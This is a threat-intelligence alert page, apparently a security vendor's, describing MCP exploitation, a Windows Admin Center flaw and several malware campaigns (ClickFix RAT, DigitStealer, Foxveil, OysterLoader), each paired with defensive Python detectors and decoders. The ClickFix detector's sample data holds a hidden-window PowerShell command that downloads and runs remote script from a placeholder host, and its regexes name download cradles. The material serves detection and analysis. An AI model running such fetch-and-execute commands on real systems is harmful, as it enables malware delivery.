
Threat Alerts

Your place for the latest CyberProof cyber threat intelligence alerts and updates


AI Integration Frameworks Targeted in Active MCP Exploitation Campaigns

23-Feb-2026
Label: Trend
Threat Level: Medium

A growing trend has emerged involving the active exploitation of Model Context Protocol (MCP) servers. MCP, introduced by Anthropic, standardizes how AI assistants integrate with external tools and platforms, and threat actors are increasingly abusing its intermediary position between the model and those tools to achieve arbitrary code execution, data exfiltration and context manipulation; reported cases include malicious MCP servers that harvested sensitive emails and triggered unintended system commands through otherwise legitimate integrations. Dynamic installation of MCP packages (fetched and run at launch rather than vetted and pinned in advance) further expands the attack surface, introducing supply-chain risk via compromised or typosquatted repositories. Together these factors make MCP-enabled AI environments an escalating target for sophisticated threat activity.
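The supply-chain point above is concrete enough to check for. The following is an added example (not code from the alert or from Anthropic's MCP project): it audits the `mcpServers` configuration layout used by MCP clients such as Claude Desktop and flags entries that install a package at launch via `npx`, `uvx` or `pipx` without a pinned version, or whose package is not on a locally reviewed allowlist. The allowlist, its version string, and the sample configuration (including the placeholder package name `example-mcp-notes-server`) are constructed for the example.

```python
"""Audit an MCP client configuration for launch-time package installs.

Added example, not from the alert or from Anthropic's MCP project. It reads
the `mcpServers` layout used by MCP clients such as Claude Desktop and flags
entries that install code at launch via `npx`/`uvx`/`pipx` without a pinned
version, or whose package is not on a locally reviewed allowlist. The
allowlist, version numbers and sample configuration are constructed.
"""
import json
import re

# Hypothetical allowlist: packages a team has reviewed, keyed to the exact
# version that was reviewed. The version string is a placeholder.
ALLOWED_PACKAGES = {
    "@modelcontextprotocol/server-filesystem": "2025.1.14",
}

# Launchers that download and run a package on first use.
DYNAMIC_INSTALLERS = {"npx", "uvx", "pipx"}
UNPINNED = {None, "latest", "*"}


def split_package_spec(spec):
    """Return (name, version) for npm 'pkg@1.2', '@scope/pkg@1.2' or PyPI 'pkg==1.2'.

    version is None when the spec carries no pin."""
    if "==" in spec:
        name, version = spec.split("==", 1)
        return name, version
    # A leading '@' is an npm scope, so only an '@' after the first character separates the version.
    m = re.match(r"^(@?[^@]+)(?:@(.+))?$", spec)
    if not m:
        return spec, None
    return m.group(1), m.group(2)


def audit_server(name, entry):
    """Return a list of (server, severity, message) findings for one mcpServers entry."""
    findings = []
    launcher = entry.get("command", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if launcher not in DYNAMIC_INSTALLERS:
        return findings  # locally installed binary; not a launch-time install
    spec = next((a for a in entry.get("args", []) if not a.startswith("-")), None)
    if spec is None:
        findings.append((name, "high", f"{launcher} invoked without an explicit package"))
        return findings
    pkg, version = split_package_spec(spec)
    pinned = version not in UNPINNED
    if not pinned:
        findings.append((name, "high", f"{pkg} is installed at launch without a pinned version"))
    if pkg not in ALLOWED_PACKAGES:
        findings.append((name, "high", f"{pkg} is not on the reviewed allowlist"))
    elif pinned and version != ALLOWED_PACKAGES[pkg]:
        findings.append((name, "medium",
                         f"{pkg}@{version} differs from reviewed version {ALLOWED_PACKAGES[pkg]}"))
    return findings


def audit_config(config_text):
    """Audit every server in a Claude Desktop style config document (JSON text)."""
    config = json.loads(config_text)
    findings = []
    for name, entry in config.get("mcpServers", {}).items():
        findings.extend(audit_server(name, entry))
    return findings


# Constructed sample configuration: one reviewed and pinned server, one
# unpinned and unreviewed package (placeholder name), one local binary.
SAMPLE_CONFIG = json.dumps({
    "mcpServers": {
        "filesystem": {
            "command": "npx",
            "args": ["-y", "@modelcontextprotocol/server-filesystem@2025.1.14", "/Users/me/Documents"],
        },
        "notes": {"command": "npx", "args": ["-y", "example-mcp-notes-server"]},
        "local-tool": {"command": "/usr/local/bin/my-mcp-server", "args": []},
    }
})

if __name__ == "__main__":
    for server, severity, message in audit_config(SAMPLE_CONFIG):
        print(f"[{severity}] {server}: {message}")
```

Run against the sample, only the `notes` server is reported (unpinned and unreviewed); the pinned, allowlisted filesystem server and the locally installed binary pass. The check says nothing about whether a pinned package is benign, only that what runs is what was reviewed.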

Critical Windows Admin Center Privilege Escalation Vulnerability

23-Feb-2026
Label: Vulnerability
Threat Level: Medium

Microsoft has disclosed a critical security vulnerability in Windows Admin Center that enables privilege escalation attacks in enterprise environments. CVE-2026-26119 (CVSS Score 8.8) affects the authentication mechanisms of this web-based management platform used to administer Windows systems, servers, and infrastructure components.

The vulnerability stems from insufficient authentication controls within Windows Admin Center’s web interface, allowing attackers to gain privileges equivalent to those of the user running the application. Despite the formal CVSS rating of 8.8, Microsoft internally classifies this flaw as critical because of the likelihood of exploitation and the potential impact on administrative environments. The risk is greatest where Windows Admin Center runs with elevated privileges, since compromise of the management layer can affect the integrity and data security of every system it manages.

ClickFix Campaign Delivers Multi-Stage Fileless RAT

23-Feb-2026
Label: Malware
Threat Level: Medium

A recent investigation uncovered an active ClickFix campaign leveraging compromised legitimate websites to deliver a sophisticated multi-stage malware chain that culminates in deployment of a custom remote access trojan (RAT). The operation spans multiple industries and geographies, using hijacked web infrastructure as delivery nodes and communicating over HTTPS with HTTP profiles crafted to resemble legitimate web analytics traffic. The final implant supports advanced post-exploitation capabilities, including token impersonation, SOCKS5 tunneling and execution of 22 distinct commands, reflecting a mature and operationally capable threat actor.

The infection chain begins with malicious JavaScript injected into legitimate websites, including a Bank Identification Number validation service, which in turn loads external scripts from a second compromised site, a legitimate fund platform. Victims are shown a fake Cloudflare verification page that silently copies a malicious PowerShell command to the clipboard and instructs them to paste and run it; because nothing is downloaded through the browser, download protections such as Mark-of-the-Web never come into play. Execution triggers a five-stage sequence: an obfuscated PowerShell downloader retrieves a second-stage script that disables Event Tracing for Windows and antivirus scanning through reflection-based in-memory patching, then deploys a Lua-based loader. The Lua component decrypts and executes embedded shellcode entirely in memory via a custom decoder, keeping the execution fully fileless.

The final payload, a native x64 executable, employs HTTP C2 profiles and operates across two infrastructure clusters – one for delivery and one for post-exploitation. The RAT provides process control, file management, interactive shell access, token manipulation, shellcode injection and SOCKS proxy tunneling.
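The clipboard-to-Run-dialog step described above leaves a recognisable shape in process telemetry: a script host spawned by explorer.exe with a one-liner that hides its window, fetches remote content and evaluates it. The following is an added example (not code from the alert or from the investigation it summarises) that scores process-creation events, reduced to parent image, image and command line as in Sysmon Event ID 1 or Windows 4688, against those indicators. The events are constructed; URLs use the reserved example.invalid domain and the encoded blob is a placeholder.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example, not from the alert or from the vendor's investigation. It
scores process-creation events (the shape of Sysmon Event ID 1 or Windows
4688, reduced to parent image, image and command line) for the pattern the
lure produces: a script host spawned by explorer.exe (the Run dialog) with a
command line carrying a hidden window, an encoded command, a download
cradle, Invoke-Expression or a "verification" comment. The events below are
constructed; URLs use the reserved example.invalid domain.
"""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}  # Win+R and the address bar launch children under explorer.exe

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|net\.webclient|curl|wget)\b",
        re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "lure_comment": re.compile(r"#.*(?:not a robot|verif|captcha)", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I),
}


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event):
    """Return the list of indicator names matched by one event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["command_line"])]
    if basename(event["parent_image"]) in RUN_DIALOG_PARENTS and basename(event["image"]) in SCRIPT_HOSTS:
        hits.insert(0, "script_host_under_explorer")
    return hits


def detect(events, threshold=2):
    """Return (index, hits) for events with at least `threshold` indicators.

    An interactive shell opened from the Run dialog scores one (the parent
    relationship alone) and is not flagged; the lure's one-liner scores
    several. Two content indicators also flag a launch from any parent."""
    flagged = []
    for i, event in enumerate(events):
        hits = score_event(event)
        if len(hits) >= threshold:
            flagged.append((i, hits))
    return flagged


# Constructed events. Index 0 is the lure; 1 and 2 are benign; 3 and 4 are variants.
SAMPLE_EVENTS = [
    {  # pasted into Win+R: hidden window, download cradle, fake verification comment
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -nop -c "iex (irm https://example.invalid/verify)" '
                        '# "I am not a robot - reCAPTCHA Verification ID: 8412"',
    },
    {  # an administrator opening an interactive shell from Win+R
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe",
    },
    {  # a scripted maintenance task
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -ExecutionPolicy Bypass -File C:\ops\patch.ps1",
    },
    {  # variant that hands a remote HTA to mshta
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta.exe https://example.invalid/v.hta",
    },
    {  # launched from Word: no explorer parent, but two content indicators
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQA=",  # constructed blob
    },
]

if __name__ == "__main__":
    for index, hits in detect(SAMPLE_EVENTS):
        print(index, ", ".join(hits))
```

On a Windows host the same launch also leaves the pasted command in the current user's `RunMRU` registry key, which is worth collecting alongside the process event during triage. The threshold of two keeps an interactive shell opened from Win+R out of the results while still catching the one-liner from any parent.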

DigitStealer macOS Infostealer Exposes C2 Infrastructure

23-Feb-2026
Label: Malware
Threat Level: Medium

A macOS-focused infostealer known as DigitStealer has exposed substantial portions of its command-and-control infrastructure, offering defenders valuable insight into its operational footprint. The malware specifically targets Apple Silicon systems, particularly M2-class devices, and is designed to extract data from 18 cryptocurrency wallets, browser stores, and macOS Keychain entries. Unlike typical malware-as-a-service operations, DigitStealer appears to function as a closed campaign without a public affiliate panel, suggesting control by a single operator or tightly coordinated group.

DigitStealer is delivered through trojanized macOS applications packaged as deceptive disk images impersonating legitimate productivity tools. Once executed, it deploys a multi-stage payload chain, establishes persistence via a Launch Agent, and polls its C2 server every 10 seconds for AppleScript or JavaScript tasking, effectively operating as a persistent backdoor. Network communications are segmented across four endpoints handling credential theft, file exfiltration, tasking, and telemetry, with a cryptographic challenge-response mechanism gating command execution. The malware transmits the system’s hardware UUID hashed with MD5; because that value is stable for a given host, it serves as a consistent detection artifact. Infrastructure analysis reveals tightly clustered .com domains hosted on a single Swedish provider, terminating HTTPS via nginx with Let’s Encrypt certificates, adjacent IP allocations, recurring SSH banners, common registrar and nameserver usage, and batch domain registrations spanning mid-2025 to early 2026. The uniform deployment patterns and centralized hosting strongly indicate a single-actor operation rather than a distributed affiliate ecosystem.
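Two of the details above translate directly into hunts. The following is an added example (not code from the alert's authors): `uuid_hash_candidates` derives the MD5 values a host would transmit so they can be searched for in proxy or TLS-inspection logs, and `find_beacons` scans per-destination connection timestamps for the 10-second polling cadence. The alert does not state how the UUID string is formatted before hashing, so the function hashes the case and hyphen variants rather than guessing one; on macOS the real UUID is read from `ioreg`, elsewhere a placeholder is used. The connection log is constructed and uses example.invalid hostnames.

```python
"""Two hunts derived from the DigitStealer tradecraft described above.

Added example, not from the alert's authors. (1) The alert says the implant
sends the MD5 of the Mac's hardware UUID; the exact string formatting it
hashes is not stated, so `uuid_hash_candidates` derives digests for the
common case and hyphen variants, giving values to search for in proxy or TLS
inspection logs. (2) The alert says it polls its C2 every 10 seconds, so
`find_beacons` scans per-destination connection timestamps for that cadence.
The connection log below is constructed; hostnames use example.invalid.
"""
import hashlib
import statistics
import subprocess
import sys
from collections import defaultdict


def uuid_hash_candidates(hw_uuid):
    """Map each plausible formatting of the UUID to its MD5 hex digest."""
    variants = {
        hw_uuid.upper(),
        hw_uuid.lower(),
        hw_uuid.upper().replace("-", ""),
        hw_uuid.lower().replace("-", ""),
    }
    return {v: hashlib.md5(v.encode()).hexdigest() for v in variants}


def local_hardware_uuid():
    """Read IOPlatformUUID from ioreg on macOS; returns None on other systems."""
    if sys.platform != "darwin":
        return None
    out = subprocess.run(["ioreg", "-rd1", "-c", "IOPlatformExpertDevice"],
                         capture_output=True, text=True, check=True).stdout
    for line in out.splitlines():
        if "IOPlatformUUID" in line:
            return line.split('"')[-2]  # value is the last quoted field on the line
    return None


def find_beacons(connections, interval=10.0, tolerance=1.5, min_count=6):
    """Return {host: median_interval} for destinations contacted at a steady cadence.

    connections: iterable of (epoch_seconds, destination_host). A host is
    reported when it has at least min_count connections whose median
    inter-arrival time is within tolerance of interval and whose jitter stays
    within tolerance of that median."""
    by_host = defaultdict(list)
    for ts, host in connections:
        by_host[host].append(ts)
    beacons = {}
    for host, times in by_host.items():
        if len(times) < min_count:
            continue
        times.sort()
        deltas = [b - a for a, b in zip(times, times[1:])]
        median = statistics.median(deltas)
        if abs(median - interval) <= tolerance and max(abs(d - median) for d in deltas) <= tolerance:
            beacons[host] = median
    return beacons


# Constructed connection log: one host polled every ~10 s, one irregular API, one CDN.
BASE = 1_760_000_000
SAMPLE_CONNECTIONS = (
    [(BASE + t, "tasking.example.invalid") for t in (0, 10.1, 19.9, 30.2, 40.0, 50.1, 60.0)]
    + [(BASE + t, "api.example.invalid") for t in (0, 7, 30, 31, 55, 90, 91)]
    + [(BASE + t, "cdn.example.invalid") for t in (3, 48, 95)]
)

if __name__ == "__main__":
    uuid = local_hardware_uuid() or "A1B2C3D4-E5F6-7890-ABCD-EF1234567890"  # placeholder off macOS
    for variant, digest in uuid_hash_candidates(uuid).items():
        print(f"{digest}  <- md5({variant})")
    print(find_beacons(SAMPLE_CONNECTIONS))
```

The cadence check is deliberately loose about absolute timing and strict about jitter: a 10-second sleep loop drifts by a fraction of a second, whereas user-driven traffic to the same host does not settle on one interval. Run it over an hour of flow data per workstation and review the hosts it returns before adding them to a blocklist, since legitimate agents also poll.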

Foxveil Malware Loader Exploits Cloud Platforms for Evasion

23-Feb-2026
Label: Malware
Threat Level: Medium

A newly discovered malware loader called “Foxveil” stages its payloads on legitimate cloud platforms, including Cloudflare, Netlify and Discord, so that its traffic blends in with trusted services and evades detection. The threat represents a further step in how attackers abuse trusted infrastructure to hide malicious operations and bypass traditional security measures.

Foxveil operates through two distinct variants that contact staging locations on legitimate cloud services to retrieve shellcode payloads. The first variant uses process injection techniques by spawning fake system processes and injecting malicious code, while the second variant performs self-injection within the same process context. Both versions establish persistence by registering as Windows services or dropping executables into system directories with names mimicking legitimate processes. The malware includes a unique string-mutation mechanism that rewrites common analysis keywords during runtime, making static detection significantly more challenging for security tools.

After establishing initial access, Foxveil downloads additional executables from cloud domains and places them strategically in system directories to maintain long-term access. The malware’s ability to blend into regular enterprise network traffic through legitimate services, combined with its runtime obfuscation capabilities, makes it particularly difficult for traditional signature-based detection systems to identify.
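The persistence technique described above, dropping executables into system directories under names that mimic legitimate processes, can be hunted from a plain file listing. The following is an added example (not code from the alert's authors) that flags two conditions: a genuine system binary name found outside the directory Windows ships it in, and a name one edit or one digit-for-letter substitution away from such a binary. The canonical-directory table covers a handful of well-known processes and should be extended from a known-good host; the file listing is constructed.

```python
"""Hunt for binaries masquerading as Windows system processes.

Added example, not from the alert's authors. The alert says Foxveil drops
executables into system directories under names mimicking legitimate
processes. Given a file listing (here constructed), this flags two things:
a genuine system binary name found outside the directory Windows ships it in,
and a name that is one edit or one digit-for-letter substitution away from a
system binary. The canonical-directory table covers a handful of well-known
processes; extend it from a known-good host.
"""
SYSTEM_BINARIES = {  # lowercase name -> directories Windows ships it in
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "csrss.exe": {r"c:\windows\system32"},
    "winlogon.exe": {r"c:\windows\system32"},
    "services.exe": {r"c:\windows\system32"},
    "spoolsv.exe": {r"c:\windows\system32"},
    "dllhost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "conhost.exe": {r"c:\windows\system32"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows", r"c:\windows\syswow64"},
}

# Substitutions that look identical at a glance in a process list.
HOMOGLYPHS = (("0", "o"), ("1", "l"), ("rn", "m"), ("vv", "w"))


def normalize(stem):
    for fake, real in HOMOGLYPHS:
        stem = stem.replace(fake, real)
    return stem


def levenshtein(a, b):
    """Edit distance, used to catch one-character additions, drops and swaps."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(path):
    """Return a reason string if the path looks like a masquerade, else None."""
    p = path.lower()
    if "\\winsxs\\" in p:
        return None  # the component store legitimately holds copies of system binaries
    directory, _, name = p.rpartition("\\")
    if name in SYSTEM_BINARIES:
        if directory in SYSTEM_BINARIES[name]:
            return None
        return f"{name} outside its expected directory"
    if not name.endswith(".exe"):
        return None
    stem = name[:-4]
    for sysname in SYSTEM_BINARIES:
        sysstem = sysname[:-4]
        if normalize(stem) == sysstem or levenshtein(stem, sysstem) <= 1:
            return f"{name} resembles {sysname}"
    return None


def audit_paths(paths):
    """Return (path, reason) for every path classify() flags."""
    results = []
    for path in paths:
        reason = classify(path)
        if reason:
            results.append((path, reason))
    return results


# Constructed file listing.
SAMPLE_PATHS = [
    r"C:\Windows\System32\svchost.exe",
    r"C:\Windows\Tasks\svchost.exe",          # real name, user-writable directory
    r"C:\Windows\System32\svch0st.exe",       # zero in place of 'o'
    r"C:\ProgramData\RuntimeBroker.exe",      # real name, wrong directory
    r"C:\Windows\System32\lsas.exe",          # one character dropped
    r"C:\Windows\System32\conhost.exe",
    r"C:\Windows\explorer.exe",
    r"C:\Program Files\Vendor\tool.exe",
]

if __name__ == "__main__":
    for path, reason in audit_paths(SAMPLE_PATHS):
        print(f"{path}: {reason}")
```

Feed it the output of a recursive directory listing of `C:\Windows` and `C:\ProgramData`, or the image paths from running-process telemetry. The two checks are complementary: the path check catches a correctly spelled name in the wrong place, the name check catches a lookalike in the right place; neither needs a signature for the binary itself, which matters against a loader whose strings change at runtime.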

OysterLoader Multi-Stage Malware Delivers Rhysida Ransomware

16-Feb-2026
Label: Malware
Threat Level: Medium

OysterLoader, a sophisticated C++ malware loader also known as Broomstick or CleanUp, has emerged as a critical threat in the cybersecurity landscape. Primarily linked to the Rhysida ransomware group and WIZARD SPIDER threat actors, this multi-stage loader employs advanced evasion techniques to deliver ransomware and commodity malware like Vidar infostealer.

The malware operates through a complex four-stage infection chain beginning with trojanized MSI installers disguised as legitimate software like PuTTY, WinSCP, and Google Authenticator. The first stage employs API flooding with hundreds of useless Windows function calls to confuse security tools, while implementing anti-debugging traps and custom dynamic API resolution using hashing algorithms. Stage two utilizes a modified LZMA compression algorithm with custom headers that prevent standard decompression tools from analyzing the payload. The third stage performs environment verification, checking for at least 60 running processes before establishing HTTPS communication with delivery servers.

The final stage demonstrates advanced steganographic techniques by hiding encrypted payloads within icon image files using RC4 encryption with hardcoded keys. Communication occurs through a dual-layer C2 infrastructure utilizing custom JSON encoding with non-standard Base64 alphabets and random shift values for each message. The malware maintains persistence through scheduled tasks running every 13 minutes and continuously evolves its communication protocols, with recent variants contacting /api/v2/facade endpoints.
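The two encoding layers above are the kind an analyst reproduces in a small decoder. The following is an added example and not the malware's real format: the alert does not publish the RC4 key, the Base64 alphabet or how the per-message shift is applied, so the key, the alphabet (a reversed standard alphabet) and the shift value are constructed, and treating the shift as a rotation of the alphabet is this example's model of the description rather than a confirmed detail. `ico_overlay` parses a real ICO directory to locate where the declared image data ends and returns whatever was appended, which `rc4` decrypts; `decode_c2_message` recovers an unknown rotation by trying all 64 and accepting the one that yields a JSON object, which is how such traffic is decoded before the scheme is fully reversed.

```python
"""Decoders for two of the OysterLoader mechanisms described above.

Added example, not from the alert's authors and not the malware's real
format: the alert does not publish the RC4 key, the Base64 alphabet or how
the per-message shift is applied, so everything below is a constructed model.
(1) `ico_overlay` parses a real ICO directory to find where the genuine image
data ends and returns what was appended, which `rc4` then decrypts with the
(here placeholder) hardcoded key. (2) `decode_c2_message` treats the "random
shift" as a rotation of a non-standard alphabet and recovers it by trying all
64 rotations until the result parses as a JSON object.
"""
import base64
import json
import string
import struct

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
BASE_ALPHABET = STD_ALPHABET[::-1]  # constructed stand-in for the malware's alphabet
KEY = b"placeholder-rc4-key"          # constructed stand-in for the hardcoded key


def rc4(key, data):
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def ico_overlay(data):
    """Return the bytes appended after the last image an ICO/CUR directory declares."""
    reserved, kind, count = struct.unpack_from("<HHH", data, 0)
    if reserved != 0 or kind not in (1, 2) or count == 0:
        raise ValueError("not an ICO/CUR header")
    end = 6 + 16 * count  # ICONDIR plus one 16-byte ICONDIRENTRY per image
    for n in range(count):
        *_, size, offset = struct.unpack_from("<BBBBHHII", data, 6 + 16 * n)
        end = max(end, offset + size)
    return data[end:]


def rotate(alphabet, shift):
    return alphabet[shift:] + alphabet[:shift]


def custom_b64_encode(raw, alphabet):
    return base64.b64encode(raw).decode().translate(str.maketrans(STD_ALPHABET, alphabet))


def custom_b64_decode(text, alphabet):
    return base64.b64decode(text.translate(str.maketrans(alphabet, STD_ALPHABET)))


def decode_c2_message(text, base_alphabet):
    """Brute-force the rotation; return (shift, message) or None."""
    for shift in range(64):
        try:
            obj = json.loads(custom_b64_decode(text, rotate(base_alphabet, shift)))
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if isinstance(obj, dict):  # garbage from a wrong shift never parses as an object
            return shift, obj
    return None


def build_sample_ico(overlay):
    """Constructed one-entry ICO (8 placeholder image bytes) with `overlay` appended."""
    image = b"\x00" * 8
    header = struct.pack("<HHH", 0, 1, 1)
    entry = struct.pack("<BBBBHHII", 16, 16, 0, 0, 1, 32, len(image), 6 + 16)
    return header + entry + image + overlay


# Constructed samples: a stage payload hidden behind an icon, and one C2 message
# encoded with the alphabet rotated by 17.
SAMPLE_ICO = build_sample_ico(rc4(KEY, b'{"stage": 4}'))
SAMPLE_WIRE = custom_b64_encode(json.dumps({"id": "host-01", "cmd": "ping"}).encode(),
                                rotate(BASE_ALPHABET, 17))

if __name__ == "__main__":
    print(rc4(KEY, ico_overlay(SAMPLE_ICO)))
    print(decode_c2_message(SAMPLE_WIRE, BASE_ALPHABET))
```

Once the real key and alphabet are lifted from the loader, the same two functions apply to the actual icon and captured traffic; the brute-force step only matters while the shift handling is unconfirmed. Parsing the ICO directory rather than searching for a marker is what keeps the overlay extraction independent of how the icon itself was built.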
